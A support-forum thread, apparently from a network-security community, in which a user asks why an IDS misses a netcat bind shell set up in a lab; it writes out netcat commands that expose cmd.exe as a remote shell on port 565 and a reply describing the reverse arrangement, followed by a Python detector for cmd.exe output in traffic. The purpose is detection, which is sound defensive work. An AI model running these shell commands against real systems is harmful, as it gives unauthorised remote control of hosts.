IPS will not detect a successful netcat attack

jopontes (Level 1)

I am doing the following lab testing:

nc -v -l -e cmd.exe -p 565

Attacker:

nc -v .x.x.x.x 565

I was able to get the remote prompt and the IDS never fires an alarm. Is there a signature for detecting this kind of attack? Or, is there any signature tuning that can be done for that? What would be the best way for detecting and firing an alarm for that attack?

Any help is highly appreciated.

5 Replies

jopontes (Level 1)

***

nc -v -l -e cmd.exe -p 565

Attacker:

nc -v .x.x.x.x 565

You are using netcat to set up a listener on port 565 and asking it to execute cmd.exe when a client connects. It doesn't actually send "cmd.exe" to the client; it redirects STDIN and STDOUT to the client.

To trigger your signature, set up the listener without a "-e" command. Have the client use "-e cmd.exe" when connecting.

Got it! But, as a matter of fact my doubt was:

Can IDS sensors detect netcat activity on the network? Does netcat operate within the RFC TCP standards and is it therefore seen as normal traffic?

Not reliably AFAIK. It's not like telnet or ftp, which tend to use specific ports or have application RFCs. With the latest version of Cisco IDS you might be able to trigger on unusual port usage (anomaly detection). I haven't played with that much yet myself.

Thanks Matt! I'll try to update the sensor and play with that then.
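As an added illustration of the point made above (example code, not from the thread and not a Cisco IDS signature): whichever side runs "-e cmd.exe", it is the shell's own banner and prompt that cross the wire, never the string "cmd.exe", so a content check on that output fires on any port, which complements the port-anomaly approach. The flow records below are constructed sample data.

```python
import re

# cmd.exe writes its banner and a drive-letter prompt to the socket when
# started via "nc -e cmd.exe" (stdin/stdout are redirected, so the shell's
# output is what the other side receives).
CMD_BANNER = re.compile(rb"Microsoft Windows[^\[\r\n]*\[Version [0-9.]+\]")
CMD_PROMPT = re.compile(rb"(?m)^[A-Za-z]:\\[^\r\n]*>[ \t]*$")

def shell_direction(flow):
    """Return 'server' or 'client' for the side whose payload looks like
    cmd.exe output, or None. flow = {'dport': int, 'server': bytes, 'client': bytes}."""
    for side in ("server", "client"):
        data = flow[side]
        if CMD_BANNER.search(data) or CMD_PROMPT.search(data):
            return side
    return None

def scan_flows(flows):
    """Map each flow name to an alert string (port included as context) or None."""
    result = {}
    for name, flow in flows.items():
        side = shell_direction(flow)
        result[name] = (
            f"windows-shell-output-from-{side}-on-port-{flow['dport']}" if side else None
        )
    return result

# Constructed sample flows (not captures from the lab in the thread).
SAMPLE_FLOWS = {
    # Listener side ran "-e cmd.exe": shell output travels server -> client.
    "bind-shell-from-thread": {
        "dport": 565,
        "server": b"Microsoft Windows XP [Version 5.1.2600]\r\n"
                  b"(C) Copyright 1985-2001 Microsoft Corp.\r\n\r\nC:\\WINDOWS\\system32>",
        "client": b"dir\r\n",
    },
    # Connecting side ran "-e cmd.exe": the same output, client -> server.
    "client-side-e-cmd": {
        "dport": 565,
        "server": b"",
        "client": b"Microsoft Windows XP [Version 5.1.2600]\r\n"
                  b"(C) Copyright 1985-2001 Microsoft Corp.\r\n\r\nC:\\>",
    },
    # Benign traffic on the same unusual port: no banner, no prompt at line start.
    "benign-http-on-565": {
        "dport": 565,
        "server": b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>C:\\ drive report</html>",
        "client": b"GET / HTTP/1.1\r\nHost: lab\r\n\r\n",
    },
}

if __name__ == "__main__":
    for name, alert in scan_flows(SAMPLE_FLOWS).items():
        print(f"{name}: {alert or 'no alert'}")
```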
